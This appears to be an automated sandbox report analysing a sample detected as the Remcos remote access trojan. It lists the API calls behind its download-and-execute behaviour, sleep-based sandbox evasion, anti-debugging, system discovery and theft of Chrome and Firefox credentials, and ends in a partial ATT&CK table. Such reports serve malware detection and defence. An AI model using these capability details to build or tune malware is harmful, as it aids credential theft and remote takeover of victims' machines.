                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00457186 push ecx; ret 0_2_00457199
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00457AA8 push eax; ret 0_2_00457AC6
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00434EB6 push ecx; ret 0_2_00434EC9
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00406EEB ShellExecuteW,URLDownloadToFileW,0_2_00406EEB
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AADB
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Delayed program exit found
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040F7E2 Sleep,ExitProcess,0_2_0040F7E2
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_0041A7D9
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeWindow / User API: threadDelayed 3221Jump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeWindow / User API: threadDelayed 6303Jump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeWindow / User API: foregroundWindowGot 1770Jump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe TID: 3220Thread sleep count: 227 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe TID: 3220Thread sleep time: -113500s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe TID: 3064Thread sleep count: 3221 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe TID: 3064Thread sleep time: -9663000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe TID: 3064Thread sleep count: 6303 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe TID: 3064Thread sleep time: -18909000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040928E
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C322
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C388
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004096A0
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408847
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00407877 FindFirstFileW,FindNextFileW,0_2_00407877
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0044E8F9 FindFirstFileExA,0_2_0044E8F9
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB6B
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419B86
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD72
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407CD2
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@"b%SystemRoot%\system32\mswsock.dll
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216298859.000000000062E000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.000000000061F000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.000000000062E000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeAPI call chain: ExitProcess graph end nodegraph_0-48974
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00443355 mov eax, dword ptr fs:[00000030h]0_2_00443355
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_004120B2 GetProcessHeap,HeapFree,0_2_004120B2
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043503C
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043BB71
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00434BD8 SetUnhandledExceptionFilter,0_2_00434BD8
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe0_2_00412132
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00419662 mouse_event,0_2_00419662
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0Z\9
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagersInfo
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.0000000000629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0Z\19
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.0000000000629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager$
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0Z\05
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0Z\7
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0Z\
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0Z\+
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0Z\0
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.0000000000629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0Z\N
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager0Z\43E
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.0000000000629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager\
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, logs.dat.0.drBinary or memory string: [Program Manager]
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.0000000000629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerz
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00434CB6 cpuid 0_2_00434CB6
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: GetLocaleInfoA,0_2_0040F90C
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_0045201B
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_004520B6
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00452143
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: GetLocaleInfoW,0_2_00452393
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00448484
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004524BC
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: GetLocaleInfoW,0_2_004525C3
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00452690
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: GetLocaleInfoW,0_2_0044896D
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00451D58
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: EnumSystemLocalesW,0_2_00451FD0
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00404F51 GetLocalTime,CreateEventA,CreateThread,0_2_00404F51
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_0041B69E GetComputerNameExW,GetUserNameW,0_2_0041B69E
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: 0_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00449210
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Remcos RAT
                          Source: Yara matchFile source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Contains functionality to steal Chrome passwords or cookies
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_0040BA4D
                          Contains functionality to steal Firefox passwords or cookies
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_0040BB6B
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: \key3.db0_2_0040BB6B

                          Remote Access Functionality

                          barindex
                          Yara detected Remcos RAT
                          Source: Yara matchFile source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.2.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4630392620.000000000222F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.2175133172.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe PID: 1516, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeCode function: cmd.exe0_2_0040569A

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Native API                          		1
